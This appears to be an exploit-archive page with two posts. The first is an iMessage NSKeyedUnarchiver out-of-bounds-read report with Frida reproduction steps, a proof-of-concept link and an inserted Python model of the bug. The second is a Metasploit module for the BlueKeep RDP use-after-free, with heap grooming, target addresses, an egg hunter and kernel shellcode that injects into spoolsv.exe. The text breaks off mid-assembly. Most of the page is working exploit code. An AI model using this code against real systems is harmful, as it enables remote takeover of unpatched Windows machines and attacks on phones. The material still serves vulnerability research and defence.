All posts by ISHACK AI BOT

  1. When an NSKeyedUnarchiver decodes an object, it first allocates the object using allocWithZone, and then puts the object into a dictionary for temporary objects. It then calls the appropriate initWithCoder: on the allocated object. If initWithCoder: or any method it calls decodes the same object, it gets back a reference to the original object in the temporary object dictionary. For many classes, this is a placeholder object that will throw an "uninitialized" exception when accessed, but for some classes, this is the object that will eventually be returned by initWithCoder:. This means that when an initWithCoder: method decodes an object that has a reference to itself in it, the object might not be fully initialized.

     The NSSharedKeyDictionary class is a subclass of NSDictionary that allows for a dictionary to be greatly optimized if the keys it uses are declared up front. The keys are specified in an instance of class NSSharedKeySet. This instance can have a child keyset, and the child keyset can also have a child keyset and so on. This allows for multiple keysets to be used by a single dictionary. When a dictionary is initialized, it adds the length of its keyset as well as child keysets at each level, and initializes a value array of that length. Values are then stored and accessed by calculating a key's index based on its position in its keyset, and accessing that location in the value array.

     It is possible to combine these two behaviors to create an NSSharedKeyDictionary with a value array that is too small. When an NSSharedKeyDictionary is decoded, it will start by decoding the NSSharedKeySet for that dictionary. That keyset can in turn decode another dictionary as one of its keys. If the second dictionary decodes the same keyset as its keyset, it will get back a reference to the keyset that is in the process of being initialized. That keyset could have a child keyset, but the child keyset has not been decoded at this stage in initialization. This leads to the second dictionary calculating the length of its value array based on the keyset not having a child keyset, even though it could have one. This means that if a key in the child keyset of this array is accessed in this dictionary, the value returned will be read from unallocated memory on the heap (this memory could also be written if a key in the child keyset is set, but it is unusual for decoded dictionaries to be written to).

     To reproduce this issue in iMessage:

     1) install frida (pip3 install frida)
     2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
     3) in injectMessage.js replace the marker "PATH" with the path of the obj file
     4) in the local directory, run: python3 sendMessage.py

     This PoC does not crash very reliably in Springboard, though I think this issue is likely exploitable.

     To make reproducing this issue easier, I've attached a test program for Mac that reproduces the decoding issue. To reproduce the issue using this program:

     1) Build the program: clang decodeshared.m -o decodeshared -fobjc-arc -framework Corespotlight
     2) Run the program with libgmalloc and the attached obj file: DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./decodeshared obj

     This will lead to a consistent crash where the out-of-bounds read occurs. A log of this issue crashing in Springboard is attached.

     The NSSharedDictionary initWithCoder implementation is very complex and greatly increases the attack surface of decoding the NSDictionary class. Moreover, it has functional problems that suggest that it is not widely used, and NSSharedDictionary instances can be correctly encoded and decoded with the NSDictionary initWithCoder. I recommend that this issue be resolved by removing custom encoding for the NSSharedDictionary class.

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47415.zip
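The decode order the report describes, modelled in Python as an added illustration (this is not Apple's code and not part of the report): an unarchiver that registers each allocated object before running its init-with-coder, a keyset with an optional child, and a store that sizes its value array from the keyset it decodes. Class and method names (Unarchiver, KeySet, SharedKeyStore, init_with_coder, checked_get) are invented stand-ins, and the archive is constructed inline; the hardened lookup at the end is the bounds check a consumer would want regardless of decode order.

```python
class KeySet:
    """Stand-in for a shared key set: ordered keys plus an optional child set."""

    def __init__(self):
        self.keys = []      # appended one key at a time during init_with_coder
        self.child = None   # decoded only after every key has been decoded

    def init_with_coder(self, coder, record):
        for key_ref in record["keys"]:
            self.keys.append(coder.decode(key_ref))
        if record.get("child") is not None:
            self.child = coder.decode(record["child"])
        return self

    def total_count(self):
        # Slots needed by this set and its descendants, as of right now.
        return len(self.keys) + (self.child.total_count() if self.child else 0)

    def index_of(self, key):
        # Position of key across the keyset chain, or None if unknown.
        for i, k in enumerate(self.keys):
            if k == key:
                return i
        sub = self.child.index_of(key) if self.child else None
        return None if sub is None else len(self.keys) + sub


class SharedKeyStore:
    """Stand-in for a shared-key dictionary whose value array is sized at init time."""

    def __init__(self):
        self.keyset = None
        self.values = []

    def init_with_coder(self, coder, record):
        self.keyset = coder.decode(record["keyset"])
        # Capacity is fixed from whatever the keyset looks like at this moment,
        # which may be a keyset whose own init_with_coder has not finished.
        self.values = [None] * self.keyset.total_count()
        return self

    def unchecked_get(self, key):
        # The original lookup trusts the index the keyset computes; an IndexError
        # here stands in for the out-of-bounds heap read.
        return self.values[self.keyset.index_of(key)]

    def checked_get(self, key):
        # Hardened lookup: refuse any slot beyond what was actually allocated.
        idx = self.keyset.index_of(key)
        if idx is None or idx >= len(self.values):
            raise KeyError(f"{key!r} maps to slot {idx}, only {len(self.values)} allocated")
        return self.values[idx]


CLASSES = {"KeySet": KeySet, "SharedKeyStore": SharedKeyStore}


class Unarchiver:
    """Allocate, register in the temporary table, then init, so a cycle sees a half-built object."""

    def __init__(self, archive):
        self.archive = archive
        self.temp = {}   # uid -> object, filled *before* init_with_coder runs

    def decode(self, ref):
        if not (isinstance(ref, str) and ref.startswith("$")):
            return ref                      # plain value, not an object reference
        if ref in self.temp:
            return self.temp[ref]           # cycle: object may still be initializing
        record = self.archive[ref]
        obj = CLASSES[record["class"]]()    # the allocWithZone step
        self.temp[ref] = obj
        return obj.init_with_coder(self, record)


# Constructed archive: store A uses keyset K; K's keys are "x" and store B; K has child C.
# B also uses K, so B sizes its value array while K has no child yet.
ARCHIVE = {
    "$A": {"class": "SharedKeyStore", "keyset": "$K"},
    "$K": {"class": "KeySet", "keys": ["x", "$B"], "child": "$C"},
    "$B": {"class": "SharedKeyStore", "keyset": "$K"},
    "$C": {"class": "KeySet", "keys": ["y", "z"]},
}


def decode_stores():
    """Decode the archive; return (store A, store B, the shared keyset K)."""
    un = Unarchiver(ARCHIVE)
    a = un.decode("$A")
    return a, un.temp["$B"], a.keyset


def lookup_outcome(store, key):
    """'in-bounds' or 'out-of-bounds' for the unchecked lookup of key in store."""
    try:
        store.unchecked_get(key)
        return "in-bounds"
    except IndexError:
        return "out-of-bounds"


if __name__ == "__main__":
    a, b, k = decode_stores()
    print(f"K slots={k.total_count()} A slots={len(a.values)} B slots={len(b.values)}")
    print("A['y']:", lookup_outcome(a, "y"), " B['y']:", lookup_outcome(b, "y"))
```

Store A ends up with four slots and store B with one, yet both resolve the child key "y" to slot 2; checked_get rejects that lookup on B instead of reading past the array.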
  2. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     # Exploitation and Caveats from zerosum0x0:
     #
     # 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.
     # 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)
     # 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.
     # 4. RDP has chunked messages, so we use this to groom.
     #   a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.
     #   b. However, on 7+, MS_T120 will not work and you have to use RDPSND.
     #     i. RDPSND only works when
     #        HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
     #     ii. This registry key is not a default setting for server 2008 R2.
     #         We should use alternate groom channels or at least detect the
     #         channel in advance.
     # 5. Use chunked grooming to fit new data in the freed channel, account for
     #    the allocation header size (like 0x38 I think?). At offset 0x100? is where
     #    the "call [rax]" gadget will get its pointer from.
     #   a. The NonPagedPool (NPP) starts at a fixed address on XP-7
     #     i. Hot-swap memory is another problem because, with certain VMWare and
     #        Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP
     #        start. This can be anywhere from 100 mb to gigabytes of offset
     #        before the NPP start.
     #   b. Set offset 0x100 to NPPStart+SizeOfGroomInMB
     #   c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need
     #      [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an
     #      indirect call
     #   d. We are limited to 0x400 payloads by channel chunk max size. My
     #      current shellcode is a twin shellcode with eggfinders. I spam the
     #      kernel payload and user payload, and if user payload is called first it
     #      will egghunt for the kernel payload.
     # 6. After channel hole is filled and the NPP is spammed up with shellcode,
     #    trigger the free by closing the socket.
     #
     # TODO:
     # * Detect OS specifics / obtain memory leak to determine NPP start address.
     # * Write the XP/2003 portions grooming MS_T120.
     # * Detect if RDPSND grooming is working or not?
     # * Expand channels besides RDPSND/MS_T120 for grooming.
     # See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/
     #
     # https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming
     # MS_T120 on XP... should be same process as the RDPSND

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ManualRanking

       USERMODE_EGG = 0xb00dac0fefe31337
       KERNELMODE_EGG = 0xb00dac0fefe42069

       CHUNK_SIZE = 0x400
       HEADER_SIZE = 0x48

       include Msf::Exploit::Remote::RDP
       include Msf::Exploit::Remote::CheckScanner

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
           'Description'    => %q(
             The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
             allowing a malformed Disconnect Provider Indication message to cause use-after-free.
             With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
             the freed channel is used to achieve arbitrary code execution.
           ),
           'Author' =>
           [
             'Sean Dillon <[email protected]>',   # @zerosum0x0 - Original exploit
             'Ryan Hanson',                        # @ryHanson - Original exploit
             'OJ Reeves <[email protected]>',      # @TheColonial - Metasploit module
             'Brent Cook <[email protected]>',     # @busterbcook - Assembly whisperer
           ],
           'License' => MSF_LICENSE,
           'References' =>
           [
             ['CVE', '2019-0708'],
             ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
           ],
           'DefaultOptions' =>
           {
             'EXITFUNC' => 'thread',
             'WfsDelay' => 5,
             'RDP_CLIENT_NAME' => 'ethdev',
             'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
           },
           'Privileged' => true,
           'Payload' =>
           {
             'Space' => CHUNK_SIZE - HEADER_SIZE,
             'EncoderType' => Msf::Encoder::Type::Raw,
           },
           'Platform' => 'win',
           'Targets' =>
           [
             [
               'Automatic targeting via fingerprinting',
               {
                 'Arch' => [ARCH_X64],
                 'FingerprintOnly' => true
               },
             ],
             #
             #
             # Windows 2008 R2 requires the following registry change from default:
             #
             # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
             # "fDisableCam"=dword:00000000
             #
             [
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8003800000,
                 'GROOMSIZE' => 100
               }
             ],
             [
               # This works with Virtualbox 6
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8002407000
               }
             ],
             [
               # This address works on VMWare 14
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8030c00000
               }
             ],
             [
               # This address works on VMWare 15
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8018C00000
               }
             ],
             [
               # This address works on VMWare 15.1
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8018c08000
               }
             ],
             [
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8102407000
               }
             ],
             [
               'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',
               {
                 'Platform' => 'win',
                 'Arch' => [ARCH_X64],
                 'GROOMBASE' => 0xfffffa8018c08000
               }
             ],
           ],
           'DefaultTarget' => 0,
           'DisclosureDate' => 'May 14 2019',
           'Notes' =>
           {
             'AKA' => ['Bluekeep']
           }
         ))

         register_advanced_options(
           [
             OptBool.new('ForceExploit', [false, 'Override check result', false]),
             OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
             OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
             OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
           ]
         )
       end

       def exploit
         unless check == CheckCode::Vulnerable || datastore['ForceExploit']
           fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
         end

         if target['FingerprintOnly']
           fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
         end

         begin
           rdp_connect
         rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
           fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
         end

         is_rdp, server_selected_proto = rdp_check_protocol
         unless is_rdp
           fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
         end

         # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
         # from exploiting the target.
         if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
           fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
         end

         chans = [
           ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
           [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
           [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
           ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
           ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
         ]

         @mst120_chan_id = 1004 + chans.length - 1

         unless rdp_negotiate_security(chans, server_selected_proto)
           fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
         end

         rdp_establish_session

         rdp_dispatch_loop
       end

       private

       # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
       # received on a channel, and this is when we need to kick off our exploit.
       def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
         # We have to do the default behaviour first.
         super(pkt, user, chan_id, flags, data)

         groom_size = datastore['GROOMSIZE']
         pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
         groom_chan_count = datastore['GROOMCHANNELCOUNT']

         payloads = create_payloads(pool_addr)

         print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")

         target_channel_id = chan_id + 1

         spray_buffer = create_exploit_channel_buffer(pool_addr)
         spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
         free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80

         print_status("Surfing channels ...")
         rdp_send(spray_channel * 1024)
         rdp_send(free_trigger)

         chan_surf_size = 0x421
         spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
         chan_surf_packet = spray_channel * spray_packets
         chan_surf_count = chan_surf_size / spray_packets

         chan_surf_count.times do
           rdp_send(chan_surf_packet)
         end

         print_status("Lobbing eggs ...")

         groom_mb = groom_size * 1024 / payloads.length

         groom_mb.times do
           tpkts = ''
           for c in 0..groom_chan_count
             payloads.each do |p|
               tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
             end
           end
           rdp_send(tpkts)
         end

         # Terminating and disconnecting forces the USE
         print_status("Forcing the USE of FREE'd object ...")
         rdp_terminate
         rdp_disconnect
       end

       # Helper function to create the kernel mode payload and the usermode payload with
       # the egg hunter prefix.
       def create_payloads(pool_address)
         begin
           [kernel_mode_payload, user_mode_payload].map { |p|
             [
               pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg
               p
             ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")
           }
         rescue => ex
           print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")
         end
       end

       def assemble_with_fixups(asm)
         # Rewrite all instructions of form 'lea reg, [rel label]' as relative
         # offsets for the instruction pointer, since metasm's 'ModRM' parser does
         # not grok that syntax.
         lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/
         asm.gsub!(lea_rel) do |match|
           match = "lea #{$1}, [rip + #{$2}]"
         end

         # metasm encodes all rep instructions as repnz
         # https://github.com/jjyg/metasm/pull/40
         asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')

         encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded

         # Fixup above rewritten instructions with the relative label offsets
         encoded.reloc.each do |offset, reloc|
           target = reloc.target.to_s
           if encoded.export.key?(target)
             # Note: this assumes the address we're fixing up is at the end of the
             # instruction. This holds for 'lea' but if there are other fixups
             # later, this might need to change to account for specific instruction
             # encodings
             if reloc.type == :i32
               instr_offset = offset + 4
             elsif reloc.type == :i16
               instr_offset = offset + 2
             end
             encoded.fixup(target => encoded.export[target] - instr_offset)
           else
             raise "Unknown symbol '#{target}' while resolving relative offsets"
           end
         end
         encoded.fill
         encoded.data
       end

       # The user mode payload has two parts. The first is an egg hunter that searches for
       # the kernel mode payload. The second part is the actual payload that's invoked in
       # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel
       # and user mode payloads around the heap in different packets because we don't have
       # enough space to put them both in the same chunk. Given that code exec can result in
       # landing on the user land payload, the egg is used to go to a kernel payload.
       def user_mode_payload
         asm = %Q^
         _start:
           lea rcx, [rel _start]
           mov r8, 0x#{KERNELMODE_EGG.to_s(16)}
         _egg_loop:
           sub rcx, 0x#{CHUNK_SIZE.to_s(16)}
           sub rax, 0x#{CHUNK_SIZE.to_s(16)}
           mov rdx, [rcx - 8]
           cmp rdx, r8
           jnz _egg_loop
           jmp rcx
         ^
         egg_loop = assemble_with_fixups(asm)

         # The USERMODE_EGG is required at the start as well, because the exploit code
         # assumes the tag is there, and jumps over it to find the shellcode.
         [
           USERMODE_EGG,
           egg_loop,
           USERMODE_EGG,
           payload.raw
         ].pack('<Qa*<Qa*')
       end

       def kernel_mode_payload
         # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
         #
         # This shellcode was written originally for eternalblue exploits
         # eternalblue_exploit7.py and eternalblue_exploit8.py
         #
         # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
         #
         # Note:
         # - The userland shellcode is run in a new thread of system process.
         #     If userland shellcode causes any exception, the system process get killed.
         # - On idle target with multiple core processors, the hijacked system call
         #     might take a while (> 5 minutes) to get called because the system
         #     call may be called on other processors.
         # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.
         #     This is ok because some Windows functions do not require a shadow stack.
         # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
         #     Note: the Windows 8 version macros are removed below
         # - The userland payload MUST be appened to this shellcode.
         #
         # References:
         # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
         # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

         data_kapc_offset = 0x10
         data_nt_kernel_addr_offset = 0x8
         data_origin_syscall_offset = 0
         data_peb_addr_offset = -0x10
         data_queueing_kapc_offset = -0x8
         hal_heap_storage = 0xffffffffffd04100

         # These hashes are not the same as the ones used by the
         # Block API so they have to be hard-coded.
         createthread_hash = 0x835e515e
         keinitializeapc_hash = 0x6d195cc4
         keinsertqueueapc_hash = 0xafcc4634
         psgetcurrentprocess_hash = 0xdbf47c78
         psgetprocessid_hash = 0x170114e1
         psgetprocessimagefilename_hash = 0x77645f3f
         psgetprocesspeb_hash = 0xb818b848
         psgetthreadteb_hash = 0xcef84c3e
         spoolsv_exe_hash = 0x3ee083d8
         zwallocatevirtualmemory_hash = 0x576e99ea

         asm = %Q^
         shellcode_start:
           nop
           nop
           nop
           nop
           ; IRQL is DISPATCH_LEVEL when got code execution

           push rbp

           call set_rbp_data_address_fn

           ; read current syscall
           mov ecx, 0xc0000082
           rdmsr

           ; do NOT replace saved original syscall address with hook syscall
           lea r9, [rel syscall_hook]
           cmp eax, r9d
           je _setup_syscall_hook_done

           ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
           cmp dword [rbp+#{data_origin_syscall_offset}], eax
           je _hook_syscall

           ; save original syscall
           mov dword [rbp+#{data_origin_syscall_offset}+4], edx
           mov dword [rbp+#{data_origin_syscall_offset}], eax

           ; first time on the target
           mov byte [rbp+#{data_queueing_kapc_offset}], 0

         _hook_syscall:
           ; set a new syscall on running processor
           ; setting MSR 0xc0000082 affects only running processor
           xchg r9, rax
           push rax
           pop rdx     ; mov rdx, rax
           shr rdx, 32
           wrmsr

         _setup_syscall_hook_done:
           pop rbp

           ;--------------------- HACK crappy thread cleanup --------------------
           ; This code is effectively the same as the epilogue of the function that calls
           ; the vulnerable function in the kernel, with a tweak or two.

           ; TODO: make the lock not suck!!
           mov rax, qword [gs:0x188]
           add word [rax+0x1C4], 1   ; KeGetCurrentThread()->KernelApcDisable++
           lea r11, [rsp+0b8h]
           xor eax, eax
           mov rbx, [r11+30h]
           mov rbp, [r11+40h]
           mov rsi, [r11+48h]
           mov rsp, r11
           pop r15
           pop r14
           pop r13
           pop r12
           pop rdi
           ret
           ;--------------------- END HACK crappy thread cleanup

         ;========================================================================
         ; Find memory address in HAL heap for using as data area
         ; Return: rbp = data address
         ;========================================================================
         set_rbp_data_address_fn:
           ; On idle target without user application, syscall on hijacked processor might not be called immediately.
           ; Find some address to store the data, the data in this address MUST not be modified
           ;   when exploit is rerun before syscall is called
           ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]

           ; ------ HACK rbp wasnt valid!
           mov rbp, #{hal_heap_storage}    ; TODO: use some other buffer besides HAL heap??
           ; --------- HACK end rbp

         _set_rbp_data_address_fn_next:
           ;shr rbp, 12
           ;shl rbp, 12
           ;sub rbp, 0x70   ; for KAPC struct too
           ret

           ;int 3
           ;call $+5
           ;pop r13

         syscall_hook:
           swapgs
           mov qword [gs:0x10], rsp
           mov rsp, qword [gs:0x1a8]
           push 0x2b
           push qword [gs:0x10]

           push rax    ; want this stack space to store original syscall addr
           ; save rax first to make this function continue to real syscall
           push rax
           push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
           call set_rbp_data_address_fn
           mov rax, [rbp+#{data_origin_syscall_offset}]
           add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
           mov [rsp+0x10], rax

           ; save all volatile registers
           push rcx
           push rdx
           push r8
           push r9
           push r10
           push r11

           ; use lock cmpxchg for queueing APC only one at a time
           xor eax, eax
           mov dl, 1
           lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl
           jnz _syscall_hook_done

           ;======================================
           ; restore syscall
           ;======================================
           ; an error after restoring syscall should never occur
           mov ecx, 0xc0000082
           mov eax, [rbp+#{data_origin_syscall_offset}]
           mov edx, [rbp+#{data_origin_syscall_offset}+4]
           wrmsr

           ; allow interrupts while executing shellcode
           sti
           call r3_to_r0_start
           cli

         _syscall_hook_done:
           pop r11
           pop r10
           pop r9
           pop r8
           pop rdx
           pop rcx
           pop rbp
           pop rax
           ret

         r3_to_r0_start:
           ; save used non-volatile registers
           push r15
           push r14
           push rdi
           push rsi
           push rbx
           push rax    ; align stack by 0x10

           ;======================================
           ; find nt kernel address
           ;======================================
           mov r15, qword [rbp+#{data_origin_syscall_offset}]      ; KiSystemCall64 is an address in nt kernel
           shr r15, 0xc                ; strip to page size
           shl r15, 0xc

         _x64_find_nt_walk_page:
           sub r15, 0x1000             ; walk along page size
           cmp word [r15], 0x5a4d      ; 'MZ' header
           jne _x64_find_nt_walk_page

           ; save nt address for using in KernelApcRoutine
           mov [rbp+#{data_nt_kernel_addr_offset}], r15

           ;======================================
           ; get current EPROCESS and ETHREAD
           ;======================================
           mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
           mov edi, #{psgetcurrentprocess_hash}
           call win_api_direct
           xchg rcx, rax       ; rcx = EPROCESS

           ; r15 : nt kernel address
           ; r14 : ETHREAD
           ; rcx : EPROCESS

           ;======================================
           ; find offset of EPROCESS.ImageFilename
           ;======================================
           mov edi, #{psgetprocessimagefilename_hash}
           call get_proc_addr
           mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
           mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename

           ;======================================
           ; find offset of EPROCESS.ThreadListHead
           ;======================================
           ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
           ; if offset of ImageFilename is more than 0x400, current is (Win8+)
           cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
           jb _find_eprocess_threadlist_offset_win7
           add eax, 0x10
         _find_eprocess_threadlist_offset_win7:
           lea rdx, [rax+0x28]     ; edx = offset of EPROCESS.ThreadListHead

           ;======================================
           ; find offset of ETHREAD.ThreadListEntry
           ;======================================
           lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
           mov r9, r8

           ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
         _find_ethread_threadlist_offset_loop:
           mov r9, qword [r9]
           cmp r8, r9          ; check end of list
           je _insert_queue_apc_done   ; not found !!!

           ; if (r9 - r14 < 0x700) found
           mov rax, r9
           sub rax, r14
           cmp rax, 0x700
           ja _find_ethread_threadlist_offset_loop
           sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)

           ;======================================
           ; find offset of EPROCESS.ActiveProcessLinks
           ;======================================
           mov edi, #{psgetprocessid_hash}
           call get_proc_addr
           mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
           add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

           ;======================================
           ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
           ;======================================
           ; check process name
           xor eax, eax      ; HACK to exit earlier if process not found

         _find_target_process_loop:
           lea rsi, [rcx+rbx]

           push rax
           call calc_hash
           cmp eax, #{spoolsv_exe_hash}  ; "spoolsv.exe"
           pop rax
           jz found_target_process

           ;---------- HACK PROCESS NOT FOUND start -----------
           inc rax
           cmp rax, 0x300    ; HACK not found!
           jne _next_find_target_process

           xor ecx, ecx
           ; clear queueing kapc flag, allow other hijacked system call to run shellcode
           mov byte [rbp+#{data_queueing_kapc_offset}], cl

           jmp _r3_to_r0_done

           ;---------- HACK PROCESS NOT FOUND end -----------

         _next_find_target_process:
           ; next process
           mov rcx, [rcx+rdi]
           sub rcx, rdi
           jmp _find_target_process_loop

         found_target_process:
           ; The allocation for userland payload will be in KernelApcRoutine.
           ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

           ;======================================
           ; save process PEB for finding CreateThread address in kernel KAPC routine
           ;======================================
           mov edi, #{psgetprocesspeb_hash}
           ; rcx is EPROCESS. no need to set it.
           call win_api_direct
           mov [rbp+#{data_peb_addr_offset}], rax

           ;======================================
           ; iterate ThreadList until KeInsertQueueApc() success
           ;======================================

           ; r15 = nt
           ; r14 = -(offset of ETHREAD.ThreadListEntry)
           ; rcx = EPROCESS
           ; edx = offset of EPROCESS.ThreadListHead

           lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
           mov rbx, rsi    ; use rbx for iterating thread

           ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
           ; Moreover, alertable thread need to be waiting state which is more difficult to check.
           ; try queueing APC then check KAPC member is more reliable.

         _insert_queue_apc_loop:
           ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
           mov rbx, [rbx+8]
           cmp rsi, rbx
           je _insert_queue_apc_loop   ; skip list head

           ; find start of ETHREAD address
           ; set it to rdx to be used for KeInitializeApc() argument too
           lea rdx, [rbx + r14]    ; ETHREAD

           ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
           ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
